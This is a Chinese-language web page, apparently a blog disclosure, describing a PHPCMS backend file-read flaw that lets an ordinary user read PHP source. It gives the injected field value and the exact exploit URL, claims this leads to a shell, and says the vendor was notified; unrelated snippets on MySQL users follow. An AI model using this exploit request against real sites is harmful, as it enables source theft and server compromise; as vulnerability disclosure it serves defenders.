後台採集裡設定採集模組中title 或者其他的內容都可以 設定為<?php [內容]?>
然後用下面的**就可以讀取到php的源了。
index.php?clientid=name&url=./caches/caches_scan/caches_data/scan_bad_file.cache.php&_=1344175735957&m=collection&c=node&a=public_test_content&nodeid=1&pc_hash=***x
拿到源基本拿到shell不難了。具體如何利用看大家自己了。(別跟我說只會讀資料庫連線檔案,並且還不能連),反正我是可以拿到shell。
修復:已提交給官方,等待補丁
phpcms後台普通使用者讀檔案0day及修復
後台採集裡設定採集模組中title 或者其他的內容都可以 設定為 然後用下面的 就可以讀取到php的源了。index.php?clientid name url caches caches scan caches data scan bad file.cache.php 1344175735957 ...
普通使用者裝配MySQL 普通使用者裝配MySQL
普通使用者安裝mysql linux這點很好,即使沒有許可權,也可以將自己想要的程式什麼的安裝到自己有許可權的目錄下。介紹一下怎麼在非root用 許可權下安裝mysql 參考 二 編譯 1 打上補丁 解壓mysql,並進入mysql 5.1.42目錄後,執行 patch np1 i mysql 5....
MySQL刪除普通使用者
mysql中,通常會建立多個普通使用者來管理資料庫 當某些使用者不再需要時,可以將其刪除 使用drop user語句刪除使用者 drop user,只需要在語句後面指定要刪除的使用者即可 drop user username hostname username hostname username,表...